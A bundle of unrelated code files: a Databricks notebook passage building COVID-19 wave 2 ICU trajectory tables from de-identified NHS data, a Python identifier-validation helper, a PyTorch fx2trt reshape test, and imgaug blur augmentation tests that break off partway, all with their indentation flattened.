# MAGIC ### 3.2 Wave 2
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave2_icu AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_icu as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2021-02-12"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave2_icu")
create_table("ccu013_covid_trajectory_graph_data_wave2_icu")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD - 55774208
# MAGIC -- New = 56225024
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave2_icu
# COMMAND ----------
# MAGIC %md
# MAGIC # 4 Reinfections (not currently used!)
# MAGIC - Identify all individuals who have had a reinfection with COVID-19
# MAGIC - __NB Not included in paper__ due to issues with non overlap on individual and time basis between sgss and pillar2
# COMMAND ----------
#import pyspark.sql.functions as funcs
#from pyspark.sql.window import Window
#reinfec = spark.sql("""
#SELECT person_id_deid, date FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
#WHERE covid_phenotype in ('01_Covid_positive_test')
#""")
#reinfect_threshold = 90 # SIREN study
# Find days between consecutive positive COVID tests
# Define window to particion by
#window = Window.partitionBy('person_id_deid').orderBy('date')
# Calculate difference in days per ID
#reinfec = reinfec.withColumn("days_passed", funcs.datediff(reinfec.date,
# funcs.lag(reinfec.date, 1).over(window)))
# Save to table
#reinfec.createOrReplaceGlobalTempView("ccu013_covid_reinfection_days_between_positive_tests")
#drop_table("ccu013_covid_reinfection_days_between_positive_tests")
#create_table("ccu013_covid_reinfection_days_between_positive_tests")
# Get the maximum difference in days between positive tests per individual
#w = Window.partitionBy('person_id_deid')
#reinfec_max_days = reinfec.withColumn('max_days_passed', f.max('days_passed').over(w))\
# .where(f.col('days_passed') == f.col('max_days_passed'))\
# .drop('max_days_passed')
## Find reinfected using reinfect_threshold
#reinfec_max_days = reinfec_max_days.withColumn('reinfected', f.when((f.col('days_passed') >= reinfect_threshold),1).otherwise(0))
#reinfec_max_days = reinfec_max_days.where(f.col('reinfected') == 1)
# Save to table
#reinfec_max_days.createOrReplaceGlobalTempView("ccu013_covid_reinfected_after_90_days")
#drop_table("ccu013_covid_reinfected_after_90_days")
#create_table("ccu013_covid_reinfected_after_90_days")
# COMMAND ----------
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
from keyword import kwlist
from ._compat import isidentifier
dict_list = [x for x in dict.__dict__]
kwset = set(kwlist + dict_list) # this is faster than iskeyword()
pat_identifier = re.compile(r"^[a-zA-Z_]\w*$")
def is_invalid_key(s):
# type: (str) -> Bool
"""
Check if a string is not a valid identifier and thus unsuitable for use as a
Pstruct key.
Invalid
:param s: string to check
:type s: str
:return: True if string is invalid
:rtype: bool
>>> is_invalid_key('aoeu')
False
>>> is_invalid_key('[aoeu')
True
>>> is_invalid_key('2aoeu')
True
>>> is_invalid_key('_2aoeu')
False
>>> is_invalid_key('ao.eu')
True
>>> is_invalid_key('items')
True
"""
if s in kwset:
return True
return not isidentifier(s)
class InvalidKeyName(Exception):
"""Key is not a valid identifier"""
def __init__(self, key_or_keys):
msg = (
"The following keys cannot be used as a key because either it is a "
"builtin method, or is not a valid identifier: {}".format(key_or_keys)
)
super(InvalidKeyName, self).__init__(msg)
|
# Owner(s): ["oncall: fx"]
import torch
import torch.fx.experimental.fx_acc.acc_ops as acc_ops
from torch.testing._internal.common_fx2trt import AccTestCase, InputTensorSpec
from parameterized import parameterized
from torch.testing._internal.common_utils import run_tests
class TestReshapeConverter(AccTestCase):
@parameterized.expand(
[
((1, 20),),
((1, 10, -1),),
]
)
def test_reshape(self, target_shape):
class TestModule(torch.nn.Module):
def __init__(self, target_shape):
super().__init__()
self.target_shape = target_shape
def forward(self, x):
return torch.reshape(x, self.target_shape)
inputs = [torch.randn(1, 2, 10)]
self.run_test(TestModule(target_shape), inputs, expected_ops={acc_ops.reshape})
@parameterized.expand(
[
((-1, 2),),
((1, 2, -1),),
]
)
def test_reshape_with_dynamic_shape(self, target_shape):
class TestModule(torch.nn.Module):
def __init__(self, target_shape):
super().__init__()
self.target_shape = target_shape
def forward(self, x):
return torch.reshape(x, self.target_shape)
input_specs = [
InputTensorSpec(
shape=(-1, -1, -1),
dtype=torch.float32,
shape_ranges=[((1, 1, 1), (1, 2, 3), (3, 3, 3))],
),
]
self.run_test_with_dynamic_shape(
TestModule(target_shape), input_specs, expected_ops={acc_ops.reshape}
)
if __name__ == '__main__':
run_tests()
|
from __future__ import print_function, division, absolute_import
import time
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
import cv2
from scipy import ndimage
import imgaug as ia
from imgaug import augmenters as iaa
from imgaug import parameters as iap
from imgaug.testutils import keypoints_equal, reseed
from imgaug.augmenters import meta
def main():
time_start = time.time()
test_GaussianBlur()
test_AverageBlur()
test_MedianBlur()
# TODO BilateralBlur
time_end = time.time()
print("<%s> Finished without errors in %.4fs." % (__file__, time_end - time_start,))
def test_GaussianBlur():
reseed()
base_img = np.array([[0, 0, 0],
[0, 255, 0],
[0, 0, 0]], dtype=np.uint8)
base_img = base_img[:, :, np.newaxis]
images = np.array([base_img])
images_list = [base_img]
outer_pixels = ([], [])
for i in sm.xrange(base_img.shape[0]):
for j in sm.xrange(base_img.shape[1]):
if i != j:
outer_pixels[0].append(i)
outer_pixels[1].append(j)
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
# no blur, shouldnt change anything
aug = iaa.GaussianBlur(sigma=0)
observed = aug.augment_images(images)
expected = images
assert np.array_equal(observed, expected)
# weak blur of center pixel
aug = iaa.GaussianBlur(sigma=0.5)
aug_det = aug.to_deterministic()
# images as numpy array
observed = aug.augment_images(images)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
observed = aug_det.augment_images(images)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
# images as list
observed = aug.augment_images(images_list)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
observed = aug_det.augment_images(images_list)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
# keypoints shouldnt be changed
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
# varying blur sigmas
aug = iaa.GaussianBlur(sigma=(0, 1))
aug_det = aug.to_deterministic()
last_aug = None
last_aug_det = None
nb_changed_aug = 0
nb_changed_aug_det = 0
nb_iterations = 1000
for i in sm.xrange(nb_iterations):
observed_aug = aug.augment_images(images)
observed_aug_det = aug_det.augment_images(images)
if i == 0:
last_aug = observed_aug
last_aug_det = observed_aug_det
else:
if not np.array_equal(observed_aug, last_aug):
nb_changed_aug += 1
if not np.array_equal(observed_aug_det, last_aug_det):
nb_changed_aug_det += 1
last_aug = observed_aug
last_aug_det = observed_aug_det
assert nb_changed_aug >= int(nb_iterations * 0.8)
assert nb_changed_aug_det == 0
#############################
# test other dtypes below
# ndimage.gaussian_filter() rejects: float16
# float64 implementation in gaussian_filter() was too inaccurate
#############################
# --
# blur of various dtypes at sigma=0
# --
aug = iaa.GaussianBlur(sigma=0)
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == image)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
_min_value, center_value, _max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = int(center_value)
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.all(image_aug == image)
# float
for dtype in [np.float16, np.float32, np.float64]:
_min_value, center_value, _max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = center_value
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.allclose(image_aug, image)
# --
# blur of various dtypes at sigma=1.0
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.GaussianBlur(sigma=1.0)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# mask = ndimage.gaussian_filter(mask, 1.0)
kernel = np.float64([
[0.08767308, 0.12075024, 0.08767308],
[0.12075024, 0.16630671, 0.12075024],
[0.08767308, 0.12075024, 0.08767308]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
expected = kernel > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image_aug = aug.augment_image(image)
expected = (kernel * 100).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image_aug = aug.augment_image(image)
expected = (kernel * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at sigma=0.4
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.GaussianBlur(sigma=0.4)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# kernel = ndimage.gaussian_filter(mask, 0.4)
kernel = np.float64([
[0.00163144, 0.03712817, 0.00163144],
[0.03712817, 0.84496158, 0.03712817],
[0.00163144, 0.03712817, 0.00163144]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
expected = kernel > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image_aug = aug.augment_image(image)
expected = (kernel * 100).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image_aug = aug.augment_image(image)
expected = (kernel * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at sigma=0.75
# and values being half-way between center and maximum for each dtype (bool is skipped as it doesnt make any
# sense here)
# The goal of this test is to verify that no major loss of resolution happens for large dtypes.
# Such inaccuracies appear for float64 if used.
# --
aug = iaa.GaussianBlur(sigma=0.75)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# kernel = ndimage.gaussian_filter(mask, 0.75)
kernel = np.float64([
[0.05469418, 0.12447951, 0.05469418],
[0.12447951, 0.28330525, 0.12447951],
[0.05469418, 0.12447951, 0.05469418]
])
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
value = int(center_value + 0.4 * max_value)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image_aug = aug.augment_image(image)
expected = (kernel * value).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
# accepts difference of 4, 8, 16 (at 1, 2, 4 bytes, i.e. 8, 16, 32 bit)
assert np.max(diff) <= 2**(1 + np.dtype(dtype).itemsize)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image_aug = aug.augment_image(image)
expected = (kernel * value).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
# accepts difference of 2.0, 4.0, 8.0, 16.0 (at 1, 2, 4, 8 bytes, i.e. 8, 16, 32, 64 bit)
assert np.max(diff) < 2**(1 + np.dtype(dtype).itemsize)
# assert failure on invalid dtypes
aug = iaa.GaussianBlur(sigma=1.0)
for dt in [np.uint64, np.int64, np.float128]:
got_exception = False
try:
_ = aug.augment_image(np.zeros((1, 1), dtype=dt))
except Exception as exc:
assert "forbidden dtype" in str(exc)
got_exception = True
assert got_exception
def test_AverageBlur():
reseed()
base_img = np.zeros((11, 11, 1), dtype=np.uint8)
base_img[5, 5, 0] = 200
base_img[4, 5, 0] = 100
base_img[6, 5, 0] = 100
base_img[5, 4, 0] = 100
base_img[5, 6, 0] = 100
blur3x3 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 11, 11, 11, 0, 0, 0, 0],
[0, 0, 0, 11, 44, 56, 44, 11, 0, 0, 0],
[0, 0, 0, 11, 56, 67, 56, 11, 0, 0, 0],
[0, 0, 0, 11, 44, 56, 44, 11, 0, 0, 0],
[0, 0, 0, 0, 11, 11, 11, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur3x3 = np.array(blur3x3, dtype=np.uint8)[..., np.newaxis]
blur4x4 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 6, 6, 6, 6, 0, 0, 0],
[0, 0, 0, 6, 25, 31, 31, 25, 6, 0, 0],
[0, 0, 0, 6, 31, 38, 38, 31, 6, 0, 0],
[0, 0, 0, 6, 31, 38, 38, 31, 6, 0, 0],
[0, 0, 0, 6, 25, 31, 31, 25, 6, 0, 0],
[0, 0, 0, 0, 6, 6, 6, 6, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur4x4 = np.array(blur4x4, dtype=np.uint8)[..., np.newaxis]
blur5x5 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 4, 4, 4, 4, 0, 0, 0],
[0, 0, 4, 16, 20, 20, 20, 16, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 16, 20, 20, 20, 16, 4, 0, 0],
[0, 0, 0, 4, 4, 4, 4, 4, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur5x5 = np.array(blur5x5, dtype=np.uint8)[..., np.newaxis]
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
# no blur, shouldnt change anything
aug = iaa.AverageBlur(k=0)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, base_img)
# k=3
aug = iaa.AverageBlur(k=3)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur3x3)
# k=5
aug = iaa.AverageBlur(k=5)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur5x5)
# k as (3, 4)
aug = iaa.AverageBlur(k=(3, 4))
nb_iterations = 100
nb_seen = [0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur4x4):
nb_seen[1] += 1
else:
raise Exception("Unexpected result in AverageBlur@1")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.4 <= p_seen[0] <= 0.6
assert 0.4 <= p_seen[1] <= 0.6
# k as (3, 5)
aug = iaa.AverageBlur(k=(3, 5))
nb_iterations = 100
nb_seen = [0, 0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur4x4):
nb_seen[1] += 1
elif np.array_equal(observed, blur5x5):
nb_seen[2] += 1
else:
raise Exception("Unexpected result in AverageBlur@2")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.23 <= p_seen[0] <= 0.43
assert 0.23 <= p_seen[1] <= 0.43
assert 0.23 <= p_seen[2] <= 0.43
# k as stochastic parameter
aug = iaa.AverageBlur(k=iap.Choice([3, 5]))
nb_iterations = 100
nb_seen = [0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur5x5):
nb_seen[1] += 1
else:
raise Exception("Unexpected result in AverageBlur@3")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.4 <= p_seen[0] <= 0.6
assert 0.4 <= p_seen[1] <= 0.6
# k as ((3, 5), (3, 5))
aug = iaa.AverageBlur(k=((3, 5), (3, 5)))
possible = dict()
for kh in [3, 4, 5]:
for kw in [3, 4, 5]:
key = (kh, kw)
if kh == 0 or kw == 0:
possible[key] = np.copy(base_img)
else:
possible[key] = cv2.blur(base_img, (kh, kw))[..., np.newaxis]
nb_iterations = 250
nb_seen = dict([(key, 0) for key, val in possible.items()])
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
for key, img_aug in possible.items():
if np.array_equal(observed, img_aug):
nb_seen[key] += 1
# dont check sum here, because 0xX and Xx0 are all the same, i.e. much
# higher sum than nb_iterations
assert all([v > 0 for v in nb_seen.values()])
# keypoints shouldnt be changed
aug = iaa.AverageBlur(k=3)
aug_det = aug.to_deterministic()
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
#############################
# test other dtypes below
#############################
# --
# blur of various dtypes at k=0
# --
aug = iaa.AverageBlur(k=0)
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image[2, 2] = True
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == image)
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = int(center_value + 0.4 * max_value)
image[2, 2] = int(center_value + 0.4 * max_value)
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.all(image_aug == image)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.allclose(image_aug, image)
# --
# blur of various dtypes at k=3
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.AverageBlur(k=3)
# prototype mask
# we place values in a 3x3 grid at positions (row=1, col=1) and (row=2, col=2) (beginning with 0)
# AverageBlur uses cv2.blur(), which uses BORDER_REFLECT_101 as its default padding mode,
# see https://docs.opencv.org/3.1.0/d2/de8/group__core__array.html
# the matrix below shows the 3x3 grid and the padded row/col values around it
# [1, 0, 1, 0, 1]
# [0, 0, 0, 0, 0]
# [1, 0, 1, 0, 1]
# [0, 0, 0, 1, 0]
# [1, 0, 1, 0, 1]
mask = np.float64([
[4/9, 2/9, 4/9],
[2/9, 2/9, 3/9],
[4/9, 3/9, 5/9]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image[2, 2] = True
image_aug = aug.augment_image(image)
expected = mask > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image[2, 2] = 100
image_aug = aug.augment_image(image)
expected = np.round(mask * 100).astype(dtype) # cv2.blur() applies rounding for int/uint dtypes
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image[2, 2] = 100.0
image_aug = aug.augment_image(image)
expected = (mask * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at k=3
# and values being half-way between center and maximum for each dtype (bool is skipped as it doesnt make any
# sense here)
# The goal of this test is to verify that no major loss of resolution happens for large dtypes.
# --
aug = iaa.AverageBlur(k=3)
# prototype mask (see above)
mask = np.float64([
[4/9, 2/9, 4/9],
[2/9, 2/9, 3/9],
[4/9, 3/9, 5/9]
])
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
value = int(center_value + 0.4 * max_value)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
expected = (mask * value).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
# accepts difference of 4, 8, 16 (at 1, 2, 4 bytes, i.e. 8, 16, 32 bit)
assert np.max(diff) <= 2**(1 + np.dtype(dtype).itemsize)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
expected = (mask * value).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
# accepts difference of 2.0, 4.0, 8.0, 16.0 (at 1, 2, 4, 8 bytes, i.e. 8, 16, 32, 64 bit)
assert np.max(diff) < 2**(1 + np.dtype(dtype).itemsize)
# assert failure on invalid dtypes
aug = iaa.AverageBlur(k=3)
for dt in [np.uint32, np.uint64, np.int32, np.int64]:
got_exception = False
try:
_ = aug.augment_image(np.zeros((1, 1), dtype=dt))
except Exception as exc:
assert "forbidden dtype" in str(exc)
got_exception = True
assert got_exception
def test_MedianBlur():
reseed()
base_img = np.zeros((11, 11, 1), dtype=np.uint8)
base_img[3:8, 3:8, 0] = 1
base_img[4:7, 4:7, 0] = 2
base_img[5:6, 5:6, 0] = 3
blur3x3 = np.zeros_like(base_img)
blur3x3[3:8, 3:8, 0] = 1
blur3x3[4:7, 4:7, 0] = 2
blur3x3[4, 4, 0] = 1
blur3x3[4, 6, 0] = 1
blur3x3[6, 4, 0] = 1
blur3x3[6, 6, 0] = 1
blur3x3[3, 3, 0] = 0
blur3x3[3, 7, 0] = 0
blur3x3[7, 3, 0] = 0
blur3x3[7, 7, 0] = 0
blur5x5 = np.copy(blur3x3)
blur5x5[4, 3, 0] = 0
blur5x5[3, 4, 0] = 0
blur5x5[6, 3, 0] = 0
blur5x5[7, 4, 0] = 0
blur5x5[4, 7, 0] = 0
blur5x5[3, 6, 0] = 0
blur5x5[6, 7, 0] = 0
blur5x5[7, 6, 0] = 0
blur5x5[blur5x5 > 1] = 1
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
# no blur, shouldnt change anything
aug = iaa.MedianBlur(k=1)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, base_img)
# k=3
aug = iaa.MedianBlur(k=3)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur3x3)
# k=5
aug = iaa.MedianBlur(k=5)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur5x5)
# k as (3, 5)
aug = iaa.MedianBlur(k=(3, 5))
seen = [False, False]
for i in sm.xrange(100):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
seen[0] = True
elif np.array_equal(observed, blur5x5):
seen[1] = True
else:
raise Exception("Unexpected result in MedianBlur@1")
if all(seen):
break
assert all(seen)
# k as stochastic parameter
aug = iaa.MedianBlur(k=iap.Choice([3, 5]))
seen = [False, False]
for i in sm.xrange(100):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
seen[0] += True
elif np.array_equal(observed, blur5x5):
seen[1] += True
else:
raise Exception("Unexpected result in MedianBlur@2")
if all(seen):
break
assert all(seen)
# keypoints shouldnt be changed
aug = iaa.MedianBlur(k=3)
aug_det = aug.to_deterministic()
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
def test_MotionBlur():
reseed()
# simple scenario
aug = iaa.MotionBlur(k=3, angle=0, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 1.0/3, 0],
[0, 1.0/3, 0],
[0, 1.0/3, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# 90deg angle
aug = iaa.MotionBlur(k=3, angle=90, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# 45deg angle
aug = iaa.MotionBlur(k=3, angle=45, direction=0.0, order=0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 1.0/3],
[0, 1.0/3, 0],
[1.0/3, 0, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# random angle
aug = iaa.MotionBlur(k=3, angle=[0, 90], direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 1.0/3, 0],
[0, 1.0/3, 0],
[0, 1.0/3, 0]
])
expected2 = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0],
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if np.allclose(matrix_channel, expected1):
nb_seen[0] += 1
elif np.allclose(matrix_channel, expected2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# 5x5
aug = iaa.MotionBlur(k=5, angle=90, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1.0/5, 1.0/5, 1.0/5, 1.0/5, 1.0/5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# random k
aug = iaa.MotionBlur(k=[3, 5], angle=90, direction=0.0)
matrix_func = aug.matrix
